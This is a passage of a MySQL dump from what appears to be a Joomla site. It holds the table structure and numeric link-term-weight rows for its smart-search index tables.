,0.32669),(4938,1686332,1.07331),(4938,1686333,1.26),(4938,1686334,0.37331),(4938,1686335,1.09669),(4938,1686336,1.26),(4938,1686337,0.23331),(4938,1686338,1.07331),(4938,1686339,1.33),(4938,1686598,0.93331),(4938,1686599,0.98),(4938,1686600,1.09669),(4938,1686601,1.35331),(4938,1686602,0.95669),(4938,1686603,1.00331),(4938,1686604,0.86331),(4938,1686605,1.09669),(4940,1688419,0.28),(4940,1688420,0.91),(4940,1688421,1.07331),(4940,1688422,0.84),(4940,1688423,1.05),(4940,1688424,0.51331),(4940,1688425,1.00331),(4940,1688426,1.28331),(4940,1688427,0.51331),(4940,1688428,1.16669),(4940,1688429,1.23669),(4940,1688430,0.28),(4940,1688431,1.09669),(4940,1688432,1.16669),(4940,1688433,1.05),(4940,1688434,1.35331),(4940,1688435,1.00331),(4940,1688436,1.09669),(4940,1688437,0.42),(4940,1688438,0.98),(4940,1688439,1.07331),(4940,1688715,0.93331),(4940,1688716,0.98),(4940,1688717,2.32339),(4940,1688718,2.49339),(4948,1689331,0.34),(4948,1689332,2.15339),(4948,1689333,2.60661),(4955,1689483,1.07331),(4955,1689484,1.02669),(4955,1689485,1.35331),(4956,1689511,2.32339);
/*!40000 ALTER TABLE `fw3gt_finder_links_termsa` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_finder_links_termsb`
--

DROP TABLE IF EXISTS `fw3gt_finder_links_termsb`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_finder_links_termsb` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_finder_links_termsb`
--

LOCK TABLES `fw3gt_finder_links_termsb` WRITE;
/*!40000 ALTER TABLE `fw3gt_finder_links_termsb` DISABLE KEYS */;
INSERT INTO `fw3gt_finder_links_termsb` VALUES (4723,1523621,1.02),(4764,1523621,1.02),(4850,1523621,1.02),(4928,1523621,1.02),(4951,1523621,1.02),(4723,1523622,2.72),(4764,1523622,2.72),(4850,1523622,2.72),(4928,1523622,2.72),(4951,1523622,2.72),(4723,1523623,3.17339),(4764,1523623,3.17339),(4850,1523623,3.17339),(4928,1523623,3.17339),(4951,1523623,3.17339),(4762,1523799,0.42),(4538,1523799,1.02),(4761,1523799,1.26),(4762,1523800,1.00331),(4538,1523800,2.43661),(4761,1523800,3.00993),(4538,1523801,2.77661),(4539,1523825,1.02),(4539,1523826,2.55),(4540,1523839,1.13339),(4552,1523944,0.09331),(4734,1523944,0.09331),(4803,1523944,0.09331),(4927,1523944,0.09331),(4938,1523944,0.09331),(4552,1523945,0.91),(4552,1523946,1.12),(4569,1524792,0.04669),(4604,1524792,0.04669),(4626,1524792,0.04669),(4693,1524792,0.04669),(4732,1524792,0.04669),(4761,1524792,0.04669),(4839,1524792,0.04669),(4847,1524792,0.04669),(4852,1524792,0.04669),(4857,1524792,0.04669),(4927,1524792,0.04669),(4571,1524792,0.09338),(4572,1524792,0.09338),(4594,1524792,0.09338),(4625,1524792,0.09338),(4661,1524792,0.09338),(4669,1524792,0.09338),(4721,1524792,0.09338),(4741,1524792,0.09338),(4749,1524792,0.09338),(4753,1524792,0.09338),(4851,1524792,0.09338),(4909,1524792,0.09338),(4917,1524792,0.09338),(4635,1524792,0.11339),(4759,1524792,0.11339),(4773,1524792,0.11339),(4780,1524792,0.11339),(4804,1524792,0.11339),(4616,1524792,0.14007),(4710,1524792,0.14007),(4658,1524792,0.16008),(4608,1524792,0.18676),(4940,1524792,0.18676),(4736,1524792,0.22678),(4849,1524792,0.23345),(4624,1524792,0.37352),(4614,1524792,0.42021),(4734,1524792,0.79373),(4798,1524792,1.02718),(4569,1524793,0.84),(4571,1524793,0.84),(4572,1524793,0.84),(4661,1524793,0.84),(4669,1524793,0.84),(4741,1524793,0.84),(4749,1524793,0.84),(4753,1524793,0.84),(4839,1524793,0.84),(4847,1524793,0.84),(4851,1524793,0.84),(4852,1524793,0.84),(4857,1524793,0.84),(4569,1524794,1.02669),(4571,1524794,1.02669),(4572,1524794,1.02669),(4661,1524794,1.02669),(4669,1524794,1.02669),(4741,1524794,1.02669),(4749,1524794,1.02669),(4753,1524794,1.02669),(4839,1524794,1.02669),(4847,1524794,1.02669),(4851,1524794,1.02669),(4852,1524794,1.02669),(4857,1524794,1.02669),(4569,1524795,0.23331),(4571,1524795,0.23331),(4572,1524795,0.23331),(4661,1524795,0.23331),(4591,1524795,0.56661),(4592,1524795,0.56661),(4569,1524796,0.88669),(4571,1524796,0.88669),(4572,1524796,0.88669),(4661,1524796,0.88669),(4569,1524797,1.14331),(4569,1524798,0.32669),(4571,1524798,0.32669),(4572,1524798,0.32669),(4661,1524798,0.32669),(4669,1524798,0.32669),(4741,1524798,0.32669),(4749,1524798,0.32669),(4753,1524798,0.32669),(4839,1524798,0.32669),(4847,1524798,0.32669),(4851,1524798,0.32669),(4852,1524798,0.32669),(4857,1524798,0.32669),(4569,1524799,1.00331),(4571,1524799,1.00331),(4572,1524799,1.00331),(4661,1524799,1.00331),(4749,1524799,1.00331),(4753,1524799,1.00331),(4839,1524799,1.00331),(4847,1524799,1.00331),(4851,1524799,1.00331),(4852,1524799,1.00331),(4857,1524799,1.00331),(4569,1524800,1.07331),(4571,1524972,0.95669),(4572,1524972,0.95669),(4661,1524972,0.95669),(4669,1524972,0.95669),(4741,1524972,0.95669),(4749,1524972,0.95669),(4753,1524972,0.95669),(4851,1524972,0.95669),(4571,1524973,1.05),(4571,1524974,1.16669),(4572,1524974,1.16669),(4661,1524974,1.16669),(4571,1524975,1.07331),(4572,1524975,1.07331),(4572,1525021,1.09669),(4661,1525021,1.09669),(4595,1527316,1.13339),(4653,1527316,1.13339),(4955,1527316,1.13339),(4593,1527378,0.45339),(4593,1527379,2.49339),(4593,1527380,2.72),(4594,1527514,0.93331),(4594,1527515,1.16669),(4594,1527516,1.02669),(4594,1527517,1.19),(4594,1527518,0.46669),(4938,1527518,0.46669),(4594,1527519,1.00331),(4938,1527519,1.00331),(4594,1527520,1.26),(4594,1527521,0.28),(4594,1527522,1.05),(4594,1527523,1.21331),(4594,1527524,0.37331),(4594,1527525,1.14331),(4594,1527526,1.30669),(4594,1527527,0.18669),(4604,1527527,0.18669),(4614,1527527,0.18669),(4734,1527527,0.18669),(4616,1527527,0.93345),(4626,1527527,1.12014),(4594,1527528,0.98),(4594,1527529,1.12),(4594,1527659,0.23331),(4594,1527660,0.88669),(4594,1527661,0.95669),(4595,1527728,3.00339),(4604,1528863,0.04669),(4749,1528863,0.04669),(4851,1528863,0.04669),(4927,1528863,0.04669),(4938,1528863,0.04669),(4617,1528863,0.09338),(4626,1528863,0.09338),(4762,1528863,0.09338),(4849,1528863,0.09338),(4917,1528863,0.09338),(4813,1528863,0.11339),(4608,1528863,0.14007),(4616,1528863,0.14007),(4777,1528863,0.18676),(4803,1528863,0.20677),(4625,1528863,0.23345),(4658,1528863,0.23345),(4721,1528863,0.23345),(4710,1528863,0.28014),(4614,1528863,0.37352),(4734,1528863,0.60697),(4604,1528913,0.14),(4608,1528913,0.14),(4614,1528913,0.14),(4617,1528913,0.14),(4625,1528913,0.14),(4635,1528913,0.14),(4732,1528913,0.14),(4761,1528913,0.14),(4777,1528913,0.14),(4849,1528913,0.14),(4734,1528913,0.28),(4917,1528913,0.28),(4927,1528913,0.28),(4948,1528913,0.34),(4626,1528913,0.56),(4710,1528913,0.56),(4721,1528913,0.7),(4604,1528947,0.56),(4608,1528947,0.56),(4617,1528947,0.56),(4626,1528947,0.56),(4604,1528948,1.19),(4608,1528948,1.19),(4617,1528948,1.19),(4626,1528948,1.19),(4604,1528949,1.4),(4608,1528949,1.4),(4617,1528949,1.4),(4604,1528953,0.32669),(4614,1528953,0.32669),(4616,1528953,0.32669),(4617,1528953,0.32669),(4625,1528953,0.32669),(4626,1528953,0.32669),(4608,1528953,0.65338),(4604,1528958,0.37331),(4608,1528958,0.37331),(4614,1528958,0.37331),(4616,1528958,0.37331),(4617,1528958,0.37331),(4625,1528958,0.37331),(4604,1528964,0.51331),(4608,1528964,0.51331),(4614,1528964,0.51331),(4604,1528970,0.14),(4608,1528970,0.14),(4614,1528970,0.14),(4616,1528970,0.14),(4617,1528970,0.14),(4625,1528970,0.14),(4604,1528971,1.00331),(4608,1528971,1.00331),(4614,1528971,1.00331),(4616,1528971,1.00331),(4617,1528971,1.00331),(4625,1528971,1.00331),(4604,1528972,1.07331),(4608,1528972,1.07331),(4614,1528972,1.07331),(4616,1528972,1.07331),(4617,1528972,1.07331),(4625,1528972,1.07331),(4604,1535962,0.37331),(4616,1535962,0.37331),(4604,1535963,1.07331),(4604,1535964,1.26),(4604,1536048,0.95669),(4604,1536049,1.16669),(4604,1536053,0.09331),(4614,1536053,0.09331),(4617,1536053,0.09331),(4710,1536053,0.09331),(4777,1536053,0.09331),(4803,1536053,0.09331),(4849,1536053,0.09331),(4940,1536053,0.09331),(4734,1536053,0.18662),(4917,1536053,0.18662),(4927,1536053,0.18662),(4938,1536053,0.18662),(4735,1536053,0.22661),(4809,1536053,0.22661),(4721,1536053,0.27993),(4604,1536054,1.02669),(4614,1536054,1.02669),(4604,1536055,1.21331),(4614,1536055,1.21331),(4604,1536056,0.60669),(4604,1536057,1.26),(4604,1536058,1.33),(4604,1536059,0.37331),(4604,1536060,1.14331),(4604,1536061,1.4),(4604,1536082,0.81669),(4616,1536082,0.81669),(4604,1536083,1.00331),(4604,1536084,0.81669),(4617,1536084,0.81669),(4625,1536084,0.81669),(4626,1536084,0.81669),(4604,1536085,0.88669),(4617,1536085,0.88669),(4625,1536085,0.88669),(4604,1536086,0.56),(4614,1536086,1.12),(4604,1536087,1.02669),(4604,1536088,1.12),(4604,1536089,1.12),(4616,1536089,1.12),(4604,1536090,1.28331),(4616,1536090,1.28331),(4604,1536091,1.09669),(4625,1536091,1.09669),(4604,1536092,1.30669),(4625,1536092,1.30669),(4604,1536093,1.33),(4604,1536094,1.4),(4604,1536095,0.98),(4604,1536096,1.19),(4604,1536097,0.23331),(4614,1536097,0.23331),(4625,1536097,0.23331),(4626,1536097,0.23331),(4604,1536098,1.02669),(4604,1536099,1.23669),(4604,1536100,0.42),(4604,1536101,1.12),(4604,1536102,1.37669),(4604,1536442,0.74662),(4604,1536443,1.12),(4604,1536444,1.21331),(4604,1536445,1.12),(4604,1536446,1.21331),(4608,1540098,0.9334),(4624,1540098,0.9334),(4625,1540098,0.9334),(4635,1540098,0.9334),(4931,1540098,1.8668),(4608,1540099,3.2),(4608,1540107,0.88669),(4608,1540108,1.12),(4608,1540109,1.86662),(4608,1540110,2.19338),(4608,1540111,0.32669),(4608,1540112,1.21331),(4608,1540113,1.4),(4608,1540114,0.23331),(4721,1540114,0.23331),(4917,1540114,0.69993),(4608,1540115,0.95669),(4608,1540116,1.14331),(4608,1540136,0.93331),(4608,1540137,1.12),(4608,1540138,0.88669),(4608,1540139,1.07331),(4614,1540140,0.88669),(4608,1540140,1.77338),(4608,1540141,1.02669),(4608,1540142,1.02669),(4608,1540143,0.09331),(4614,1540143,0.09331),(4608,1540144,0.81669),(4608,1540145,0.88669),(4608,1540146,0.14),(4614,1540146,0.14),(4608,1540147,0.86331),(4608,1540148,0.93331),(4608,1540149,0.09331),(4614,1540149,0.09331),(4608,1540150,0.81669),(4608,1540151,0.88669),(4608,1540152,0.09331),(4614,1540152,0.09331),(4608,1540153,0.81669),(4608,1540154,0.88669),(4608,1540155,0.81669),(4608,1540156,0.86331),(4608,1540157,0.37331),(4608,1540158,1.07331),(4608,1540159,1.26),(4608,1540160,2.94021),(4614,1540160,3.92028),(4608,1540161,0.91),(4614,1540161,0.91),(4608,1540162,1.00331),(4608,1540163,0.93331),(4614,1540163,0.93331),(4608,1540164,1.00331),(4608,1540165,0.95669),(4614,1540165,0.95669),(4608,1540166,1.05),(4608,1540167,0.93331),(4614,1540167,0.93331),(4608,1540168,1.00331),(4608,1540169,0.93331),(4614,1540169,0.93331),(4608,1540170,1.00331),(4608,1540171,0.93331),(4614,1540171,0.93331),(4608,1540172,1.00331),(4608,1540173,0.91),(4614,1540173,0.91),(4608,1540174,1.00331),(4608,1540175,0.93331),(4614,1540175,0.93331),(4608,1540176,1.00331),(4608,1540177,0.91),(4614,1540177,0.91),(4608,1540178,1.00331),(4614,1540179,0.42),(4608,1540179,0.84),(4608,1540180,2.1),(4608,1540181,2.24),(4608,1540182,1.13339),(4614,1540182,1.13339),(4849,1540183,0.32669),(4927,1540183,0.32669),(4608,1540183,0.65338),(4608,1540184,1.07331),(4608,1540185,1.14331),(4608,1540186,1.07331),(4608,1540187,1.12),(4608,1540188,0.56),(4614,1540188,0.56),(4608,1540189,1.07331),(4608,1540190,1.37669),(4608,1540191,1.02669),(4617,1540191,1.02669),(4608,1540192,1.07331),(4608,1540193,1.05),(4608,1540194,1.16669),(4608,1540195,1.09669),(4608,1540196,1.16669),(4608,1540197,0.60669),(4608,1540198,1.07331),(4608,1540199,1.21331),(4608,1540200,1.16669),(4608,1540201,1.35331),(4608,1540202,0.46662),(4608,1540203,2.33338),(4608,1540204,2.8),(4608,1540638,0.56),(4608,1540639,2.05338),(4608,1540640,2.52),(4614,1546236,1.00331),(4614,1546237,1.05),(4614,1546238,0.93331),(4614,1546239,1.09669),(4614,1546240,1.05),(4614,1546241,1.16669),(4614,1546242,1.02669),(4614,1546243,1.33),(4614,1546244,0.93331),(4614,1546245,1.12),(4614,1546246,0.91),(4614,1546247,1.00331),(4614,1546248,1.72662),(4614,1546249,0.93331),(4614,1546250,1.21331),(4614,1546251,0.32669),(4614,1546252,1.05),(4614,1546253,1.14331),(4614,1546254,0.32669),(4614,1546255,1.09669),(4614,1546256,1.23669),(4614,1546293,0.98),(4614,1546294,1.12),(4614,1546295,1.77338),(4614,1546296,0.98),(4614,1546297,1.12),(4614,1546298,1.00331),(4614,1546299,1.07331),(4614,1546300,1.00331),(4614,1546301,1.26),(4614,1546302,1.91338),(4614,1546303,1.12),(4614,1546304,1.30669),(4614,1546305,0.91),(4614,1546306,1.00331),(4614,1546307,1.19),(4614,1546308,0.91),(4614,1546309,1.02669),(4614,1546310,1.12),(4614,1546311,1.21331),(4614,1546312,1.00331),(4614,1546313,1.12),(4614,1546314,0.09331),(4614,1546315,1.00331),(4614,1546316,1.19),(4614,1546317,0.09331),(4614,1546318,1.02669),(4614,1546319,1.21331),(4614,1546320,1.00331),(4614,1546321,1.12),(4614,1546322,0.09331),(4614,1546323,0.93331),(4614,1546324,1.12),(4614,1546325,0.95669),(4614,1546326,1.02669),(4614,1546327,0.46669),(4614,1546328,1.05),(4614,1546329,1.37669),(4614,1546330,0.23331),(4614,1546331,0.91),(4614,1546332,1.07331),(4614,1546333,1.09669),(4614,1546334,1.09669),(4614,1546335,1.30669),(4614,1546336,1.19),(4614,1546337,0.93331),(4614,1546338,1.19),(4614,1546339,0.93331),(4614,1546340,1.21331),(4614,1546341,1.19),(4614,1546342,0.93331),(4614,1546343,1.12),(4614,1546344,1.30669),(4614,1546345,1.14331),(4614,1546346,1.14331),(4614,1546347,1.19),(4614,1546348,1.19),(4614,1546349,1.26),(4614,1546350,0.37331),(4614,1546351,1.14331),(4614,1546352,1.26),(4614,1546353,2.77661),(4614,1546354,3.34339),(4614,1546355,0.7),(4614,1546356,1.4),(4614,1546357,1.4),(4614,1546358,0.46669),(4614,1546359,1.19),(4614,1546360,1.4),(4614,1546361,1.30669),(4614,1546362,1.4),(4614,1546363,1.14331),(4614,1546364,1.4),(4614,1546365,1.21331),(4614,1546366,1.4),(4614,1546367,0.7),(4616,1546367,0.7),(4614,1546368,1.09669),(4614,1546369,1.37669),(4614,1546370,0.65331),(4614,1546371,1.07331),(4614,1546372,1.4),(4614,1546373,0.37331),(4614,1546374,1.05),(4614,1546375,1.26),(4614,1546376,1.12),(4626,1546376,1.12),(4614,1546377,1.28331),(4614,1546378,0.95669),(4616,1546378,0.95669),(4617,1546378,0.95669),(4614,1546379,1.09669),(4616,1546379,1.09669),(4617,1546379,1.09669),(4614,1546380,0.32669),(4614,1546381,0.98),(4614,1546382,1.19),(4614,1546383,0.37331),(4614,1546384,1.02669),(4614,1546385,1.12),(4614,1546386,0.18669),(4614,1546387,0.86331),(4614,1546388,0.91),(4614,1546389,1.23669),(4614,1546390,1.4),(4614,1546391,0.51331),(4617,1546391,0.51331),(4625,1546391,0.51331),(4626,1546391,0.51331),(4614,1546392,1.30669),(4614,1546393,1.4),(4616,1546394,0.18669),(4614,1546394,0.56007),(4614,1546395,0.93331),(4616,1546395,0.93331),(4614,1546396,0.98),(4614,1546397,0.84),(4614,1546398,1.19),(4614,1546399,0.86331),(4614,1546400,0.91),(4614,1546401,0.84),(4614,1546402,1.05),(4614,1546403,0.65331),(4614,1546404,1.4),(4614,1546405,1.4),(4614,1546406,0.91),(4626,1546406,0.91),(4614,1546407,0.95669),(4614,1546408,0.28),(4625,1546408,0.28),(4614,1546409,0.91),(4625,1546409,0.91),(4614,1546410,1.12),(4614,1546411,0.18669),(4734,1546411,0.37338),(4614,1546412,0.95669),(4614,1546413,1.00331),(4614,1546414,0.32669),(4777,1546414,0.32669),(4614,1546415,0.93331),(4777,1546415,0.93331),(4614,1546416,1.05),(4614,1547086,0.7),(4614,1547087,1.14331),(4614,1547088,1.23669),(4614,1547089,0.28),(4614,1547090,0.95669),(4614,1547091,1.00331),(4616,1547729,1.09669),(4616,1547730,1.26),(4616,1547755,1.02669),(4616,1547756,1.19),(4616,1547757,0.93331),(4616,1547758,0.98),(4616,1547759,1.02669),(4617,1547759,1.02669),(4616,1547760,1.07331),(4616,1547768,0.95669),(4616,1547769,0.91),(4635,1547769,2.21),(4616,1547770,0.95669),(4616,1547771,0.84),(4616,1547772,1.02669),(4616,1547773,0.42),(4616,1547774,1.09669),(4616,1547775,1.33),(4616,1547776,0.37331),(4616,1547777,0.93331),(4616,1547778,1.02669),(4616,1547779,0.42),(4616,1547780,0.95669),(4616,1547781,1.07331),(4616,1547782,1.14331),(4616,1547783,1.30669),(4616,1547784,1.14331),(4616,1547785,0.86331),(4616,1547786,1.05),(4616,1547787,4.01324),(4616,1547788,1.05),(4616,1547789,1.05),(4616,1547790,1.05),(4616,1547791,1.12),(4617,1548213,1.6),(4617,1548214,3.4),(4617,1548221,1.28331),(4617,1548222,1.02669),(4617,1548223,1.23669),(4617,1548224,0.91),(4617,1548225,0.98),(4617,1548226,0.32669),(4617,1548227,1.09669),(4617,1548228,1.35331),(4617,1548229,0.60669),(4617,1548230,1.07331),(4617,1548231,1.12),(4617,1548232,0.51331),(4617,1548233,1.30669),(4617,1548234,1.4),(4617,1548253,0.37331),(4625,1548253,0.37331),(4617,1548254,1.07331),(4617,1548255,1.14331),(4617,1548256,0.32669),(4625,1548256,0.32669),(4617,1548257,1.00331),(4617,1548258,1.07331),(4617,1548259,0.23331),(4625,1548259,0.46662),(4617,1548260,0.88669),(4617,1548261,0.98),(4617,1548262,0.32669),(4940,1548262,0.79339),(4617,1548263,1.12),(4617,1548264,1.23669),(4617,1548265,1.09669),(4617,1548266,0.46669),(4617,1548267,1.07331),(4617,1548268,1.12),(4617,1548269,1.16669),(4617,1548270,1.4),(4617,1548271,0.32669),(4617,1548272,1.19),(4617,1548273,1.26),(4617,1548473,0.60669),(4617,1548474,1.28331),(4617,1548475,1.4),(4624,1553930,0.51331),(4624,1553931,1.19),(4624,1553932,1.37669),(4624,1553933,0.32669),(4624,1553934,1.16669),(4624,1553935,1.4),(4624,1554005,0.51331),(4624,1554006,1.12),(4624,1554007,1.19),(4624,1554039,1.58662),(4624,1554040,1.68),(4624,1554041,1.05),(4624,1554042,1.4),(4624,1554043,1.02669),(4624,1554044,1.23669),(4624,1554045,0.84),(4798,1554045,0.84),(4624,1554046,0.91),(4624,1554047,0.77),(4624,1554048,0.88669),(4624,1554049,1.02669),(4798,1554049,1.02669),(4624,1554050,1.14331),(4624,1554051,0.91),(4624,1554052,0.98),(4624,1554053,0.23331),(4624,1554054,0.86331),(4624,1554055,1.02669),(4624,1554056,0.56),(4624,1554057,1.19),(4624,1554058,1.4),(4624,1554059,0.37331),(4624,1554060,1.09669),(4624,1554061,1.30669),(4624,1554062,0.37331),(4624,1554063,1.19),(4624,1554064,1.30669),(4624,1554065,0.7),(4624,1554066,1.09669),(4624,1554067,1.19),(4624,1554068,0.23331),(4624,1554069,0.98),(4624,1554070,1.07331),(4624,1554071,0.37331),(4624,1554072,0.95669),(4624,1554073,1.19),(4624,1554074,0.7),(4624,1554075,1.4),(4624,1554076,1.4),(4624,1554077,0.23331),(4624,1554078,1.19),(4624,1554079,1.4),(4624,1554080,0.37338),(4624,1554081,0.84),(4624,1554082,1.02669),(4624,1554083,1.00331),(4624,1554084,1.23669),(4624,1554085,0.65331),(4624,1554086,1.35331),(4624,1554087,1.4),(4624,1554088,0.7),(4624,1554089,1.37669),(4624,1554090,1.4),(4624,1554091,0.7),(4624,1554092,1.26),(4624,1554093,1.4),(4624,1554094,0.42),(4624,1554095,1.30669),(4624,1554096,1.4),(4624,1554097,0.32669),(4624,1554098,1.02669),(4624,1554099,1.09669),(4624,1554464,0.37331),(4624,1554465,1.02669),(4624,1554466,1.19),(4625,1554877,2.9334),(4625,1554888,0.65331),(4625,1554889,1.21331),(4625,1554890,1.33),(4625,1554891,0.77),(4734,1554891,1.54),(4625,1554892,0.95669),(4625,1554893,0.95669),(4625,1554894,1.02669),(4625,1554895,0.93331),(4625,1554896,1.12),(4625,1554897,0.91),(4625,1554898,0.98),(4625,1554899,1.02669),(4625,1554900,1.21331),(4625,1554904,1.02),(4625,1554905,2.43661),(4625,1554906,2.89),(4625,1554907,1.40007),(4625,1554908,1.14331),(4625,1554909,1.21331),(4625,1554910,1.14331),(4625,1554911,1.23669),(4625,1554912,1.28331),(4625,1554913,1.4),(4625,1554914,0.51331),(4625,1554915,1.14331),(4625,1554916,1.19),(4625,1554917,0.42),(4625,1554918,1.23669),(4625,1554919,1.28331),(4625,1554948,0.95669),(4625,1554949,1.21331),(4625,1554950,0.91),(4625,1554951,1.05),(4625,1554952,1.02669),(4625,1554953,1.19),(4625,1554954,1.05),(4625,1554955,1.12),(4625,1554956,0.91),(4625,1554957,0.95669),(4625,1554958,0.95669),(4625,1554959,1.05),(4625,1554960,0.56),(4626,1554960,0.56),(4625,1554961,1.19),(4626,1554961,1.19),(4625,1554962,1.33),(4625,1554963,0.28),(4625,1554964,0.95669),(4625,1554965,1.00331),(4625,1554966,0.51331),(4625,1554967,1.19),(4625,1554968,1.4),(4625,1554969,1.09669),(4625,1554970,1.28331),(4625,1554971,0.42),(4625,1554972,1.14331),(4625,1554973,1.33),(4625,1554974,1.12),(4625,1554975,1.28331),(4625,1554976,0.42),(4917,1554976,1.68),(4625,1554977,1.02669),(4625,1554978,1.30669),(4625,1554979,0.95669),(4625,1554980,1.21331),(4625,1554981,0.28),(4625,1554982,1.02669),(4625,1554983,1.35331),(4625,1554984,0.23331),(4625,1554985,0.98),(4625,1554986,1.09669),(4625,1554987,1.26),(4625,1555437,0.37331),(4625,1555438,1.02669),(4625,1555439,1.37669),(4625,1555440,0.28),(4625,1555441,0.91),(4625,1555442,1.16669),(4626,1556000,0.1334),(4626,1556001,2.8),(4626,1556002,3.4666),(4626,1556051,1.28331),(4626,1556052,1.4),(4626,1556053,0.93331),(4626,1556054,0.98),(4626,1556055,0.28),(4734,1556055,0.28),(4626,1556056,1.12),(4626,1556057,1.33),(4626,1556058,0.18669),(4626,1556059,0.93331),(4626,1556060,1.12),(4626,1556155,1.00331),(4626,1556156,1.07331),(4626,1556157,1.39986),(4626,1556158,5.32014),(4626,1556159,1.96),(4626,1556160,3.73324),(4626,1556161,0.81669),(4626,1556162,0.86331),(4626,1556163,0.86331),(4626,1556164,0.88669),(4626,1556165,1.02669),(4626,1556166,0.98),(4626,1556167,1.14331),(4626,1556168,0.46669),(4626,1556169,1.00331),(4626,1556170,1.21331),(4626,1556171,0.37331),(4626,1556172,1.09669),(4626,1556173,1.28331),(4626,1556174,0.51331),(4626,1556175,1.19),(4626,1556176,1.28331),(4626,1556177,1.33),(4626,1556178,0.46669),(4626,1556179,0.98),(4626,1556180,1.21331),(4626,1556181,0.56),(4626,1556182,1.05),(4626,1556183,1.33),(4626,1556184,0.51331),(4626,1556185,1.16669),(4626,1556186,1.21331),(4626,1556187,1.26),(4626,1556188,0.37331),(4626,1556189,1.05),(4626,1556190,1.35331),(4626,1556191,0.28),(4626,1556192,1.23669),(4626,1556193,1.4),(4626,1556194,0.28),(4626,1556195,1.14331),(4626,1556196,1.35331),(4626,1556197,1.05),(4626,1556198,1.14331),(4626,1556199,2.58993),(4626,1556200,3.29007),(4626,1556201,3.00993),(4626,1556202,3.63993),(4626,1556203,1.21338),(4626,1556204,2.38),(4626,1556205,1.4),(4626,1556206,1.28331),(4626,1556207,1.19),(4626,1556208,0.32669),(4626,1556209,0.98),(4626,1556210,1.02669),(4626,1556211,0.56),(4626,1556212,1.19),(4626,1556213,1.37669),(4626,1556214,0.32669),(4626,1556215,1.19),(4626,1556216,1.23669),(4626,1556854,0.7),(4626,1556855,1.4),(4626,1556856,1.4),(4626,1556857,0.7),(4626,1556858,1.4),(4626,1556859,1.4),(4626,1556860,0.84),(4626,1556861,2.73),(4626,1556862,1.12),(4626,1556863,2.47338),(4626,1556864,0.32669),(4626,1556865,0.93331),(4626,1556866,1.19),(4635,1558508,1.24661),(4635,1558509,3.00339),(4635,1558510,3.11661),(4635,1558511,0.98),(4635,1558512,1.12),(4653,1560566,0.8),(4653,1560567,2.6),(4653,1560568,3.2),(4653,1560643,2.49339),(4653,1560644,3.06),(4653,1560645,1.13339),(4653,1560646,2.72),(4653,1560647,3.11661),(4761,1560648,0.32669),(4653,1560648,0.79339),(4664,1560648,0.79339),(4653,1560649,2.66339),(4653,1560650,3.11661),(4653,1560651,0.68),(4734,1560651,0.84),(4653,1560652,2.21),(4653,1560653,2.60661),(4653,1560654,0.90661),(4658,1560654,2.98648),(4653,1560655,2.38),(4653,1560656,2.72),(4653,1560657,0.79339),(4653,1560658,2.55),(4653,1560659,2.72),(4658,1562950,2.31),(4658,1562951,2.00662),(4658,1562952,0.98),(4658,1562953,0.77),(4658,1562954,1.00331),(4658,1562955,1.00331),(4658,1562956,1.16669),(4658,1562969,3.52008),(4658,1562970,4.15992),(4658,1562971,0.46669),(4940,1562971,0.46669),(4658,1562972,1.16669),(4658,1562973,1.37669),(4658,1562974,0.28),(4658,1562975,1.12),(4658,1562976,1.35331),(4658,1562977,0.32669),(4940,1562977,0.32669),(4938,1562977,1.77346),(4658,1562978,0.98),(4658,1562979,1.09669),(4658,1562980,0.98),(4658,1562981,1.07331),(4658,1562982,0.98),(4658,1562983,1.07331),(4658,1562984,1.96),(4658,1562985,1.07331),(4658,1562986,1.07331),(4658,1562987,0.98),(4658,1562988,1.07331),(4658,1562989,0.98),(4658,1562990,1.07331),(4658,1562991,0.95669),(4658,1562992,1.05),(4658,1562993,0.95669),(4658,1562994,1.05),(4658,1562995,0.32669),(4658,1562996,1.05),(4658,1562997,1.09669),(4658,1562998,1.27992),(4658,1562999,3.67992),(4658,1563000,1.33),(4669,1563379,1.07331),(4661,1563389,0.37331),(4669,1563389,0.37331),(4661,1563462,0.6666),(4839,1563462,1.3332),(4661,1563463,3),(4661,1563464,3.4),(4661,1563470,1.21331),(4661,1563481,0.95669),(4661,1563482,1.05),(4664,1563634,2.26661),(4664,1563635,2.89),(4664,1563636,0.79339),(4664,1563637,2.49339),(4664,1563638,2.66339),(4669,1564747,1.00331),(4669,1564748,1.21331),(4669,1564757,1.02669),(4669,1564758,1.14331),(4761,1568186,0.37331),(4687,1568186,0.90661),(4732,1568186,1.49324),(4687,1568604,2.66339),(4693,1569278,0.14),(4693,1569279,0.84),(4693,1569280,1.09669),(4693,1569307,0.46669),(4940,1569307,0.46669),(4693,1569308,1.05),(4693,1569309,1.21331),(4693,1569320,1.05),(4693,1569321,1.23669),(4710,1584170,0.46669),(4721,1584170,0.46669),(4710,1584182,0.23331),(4721,1584182,0.23331),(4735,1584182,0.56661),(4710,1584205,0.32669),(4721,1584205,0.65338),(4710,1584213,0.28),(4721,1584213,0.28),(4710,1584214,0.93331),(4721,1584214,0.93331),(4710,1592176,1.00331),(4710,1592177,1.35331),(4710,1592178,0.95669),(4710,1592179,1.26),(4710,1592180,1.02669),(4710,1592181,1.26),(4710,1592182,0.98),(4710,1592183,1.09669),(4710,1592184,0.98),(4710,1592185,1.09669),(4710,1592186,1.05),(4710,1592187,1.30669),(4710,1592188,0.98),(4710,1592189,1.28331),(4710,1592190,0.32669),(4710,1592191,0.93331),(4710,1592192,1.05),(4710,1592193,0.32669),(4727,1592193,0.79339),(4710,1592194,1.00331),(4710,1592195,1.14331),(4710,1592219,0.88669),(4710,1592220,1.14331),(4710,1592221,0.86331),(4710,1592222,0.98),(4710,1592223,0.91),(4917,1592223,0.91),(4710,1592224,1.23669),(4710,1592225,0.84),(4710,1592226,1.00331),(4710,1592227,0.98),(4710,1592228,1.07331),(4710,1592229,1.02669),(4710,1592230,1.26),(4710,1592231,0.91),(4710,1592232,1.02669),(4710,1592233,0.60669),(4710,1592234,1.12),(4710,1592235,1.35331),(4710,1592236,0.46669),(4710,1592237,1.09669),(4710,1592238,1.16669),(4710,1592239,0.51331),(4710